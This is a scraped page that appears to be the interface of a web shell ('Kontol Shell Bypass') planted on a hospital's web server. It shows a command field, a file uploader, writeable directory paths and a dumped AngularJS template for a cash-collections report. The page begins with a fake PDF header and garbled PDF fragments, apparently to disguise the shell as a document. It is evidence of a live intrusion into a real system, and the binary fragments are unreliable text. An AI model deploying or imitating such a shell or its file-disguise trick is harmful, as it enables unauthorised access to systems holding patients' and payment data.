%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/lms/lms/views/reports/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/lms/lms/views/reports/cash_payments.html
<div class="page-bar">
    <ul class="page-breadcrumb uc">
        <li><h2>Report - Cash Collections</h2></li>
    </ul>
    <div class="page-toolbar">
    </div>
</div>
<!-- -->

<div class="tabbable-custom">
    <ul class="nav nav-tabs">
        <li class="active">
            <a href="#tab_1" data-toggle="tab" aria-expanded="true" onclick="event.preventDefault()"> Summary </a>
        </li>
        <li>
            <a href="#tab_2" data-toggle="tab" aria-expanded="true" onclick="event.preventDefault()"> Full Lists </a>
        </li>
    </ul>

    <div class="tab-content nobdr">
        <!-- Summary -->
        <div class="tab-pane active" id="tab_1">
            <div class="mb5 w300" ng-if="CR.summary.length">
                <div class="input-icon right">
                    <i class="fa fa-search font-yellow"></i>
                    <input type="text" class="form-control" ng-model="CR.search_callers" placeholder="Search">
                </div>
            </div>

            <div class="table-responsive" ng-if="CR.summary.length">
                <table class="table table-striped table-bordered table-advance table-hover">
                    <thead class="vmid">
                        <tr>
                            <th class="w20">#</th>
                            <th>Counsellor/Caller</th>
                            <th class="w150">Counsellor Type</th>
                            <th class="w150 text-right">Today's Collection</th>
                            <th class="w200 text-right">Till Yesterday's Collection</th>
                            <th class="w120 text-right">Total</th>
                        </tr>
                    </thead>
    
                    <tbody>
                        <tr ng-repeat="(i,r) in CR.summary | filter:CR.search_callers">
                            <td>{{i+1}}.</td>
                            <td><a href="" ng-click="CR.view_user_collections(r.id)">{{r.name}}</a></td>
                            <td>{{r.type}}</td>
                            <td class="text-right">INR {{r.today_amt}}</td>
                            <td class="text-right">INR {{r.till_yest_amt}}</td>
                            <td class="text-right bold">INR {{r.total}}</td>
                        </tr>
                    </tbody>
                </table>
            </div>
        </div>

        <!-- Full Lists -->
        <div class="tab-pane" id="tab_2">
            <!-- Search -->
            <div class="form-group">
                <a href="" class="btn purple pull-right" ng-click="CR.export_lists()"><i class="fa fa-file-excel-o"></i> Export</a>
                <form ng-submit="CR.lists()">
                    <div class="form-inline fc-sm">
                        <input type="text" ng-model="CR.sdata.k" class="form-control w200" placeholder="Keyword..." />
                        <input type="text" ng-model="CR.sdata.from_date" class="form-control w130 cal hasCal" placeholder="From Date" />
                        <input type="text" ng-model="CR.sdata.to_date" class="form-control w130 cal hasCal" placeholder="To Date" />
                        <select ng-model="CR.sdata.user_id" class="form-control">
                            <option value="">Received By (ALL)</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.users">{{r.name}}</option>
                        </select>&nbsp;
                        <button type="submit" class="btn btn-info">Search</button>
                    </div>
                </form>
            </div>
            <!-- / -->
            
            <div ng-if="CR.result.length">
                <div class="text-secondary bold mb10">
                    <div class="pull-left">
                        Showing {{CR.page.start+1}} - {{CR.page.start+CR.page.total}} of {{CR.page.total_records}} records.
                    </div>
                    <div class="pull-right">Total: INR {{CR.total_amt | number:2}}</div>
                    <div class="clearfix"></div>
                </div>
        
                <div class="table-responsive">
                    <table class="table table-striped table-bordered table-advance table-hover">
                        <thead class="vmid">
                            <tr>
                                <th class="w20">#</th>
                                <th class="w120">System ID</th>
                                <th>Applicant</th>
                                <th class="w120">Mobile</th>
                                <th style="width:170px">Date/Time</th>
                                <th class="w200">Received By</th>
                                <th class="w120 text-right">Amount</th>
                            </tr>
                        </thead>
        
                        <tbody>
                            <tr ng-repeat="(i,r) in CR.result">
                                <td>{{i+CR.page.start+1}}.</td>
                                <td>{{r.application_no}}</td>
                                <td>{{r.name}}</td>
                                <td>{{r.mob}}</td>
                                <td>{{r.created}}</td>
                                <td>{{r.usr}}</td>
                                <td class="text-right">INR {{r.amount}}</td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <div class="bold" ng-show="CR.page.total_pages>1">
                    <div dir-paging fn="CR.lists" pageob="CR.page"></div>
                </div>
            </div>
            <div class="text-center text-default pd20" ng-if="!CR.result.length">No record found.</div>
        </div>
    </div>
</div>

Kontol Shell Bypass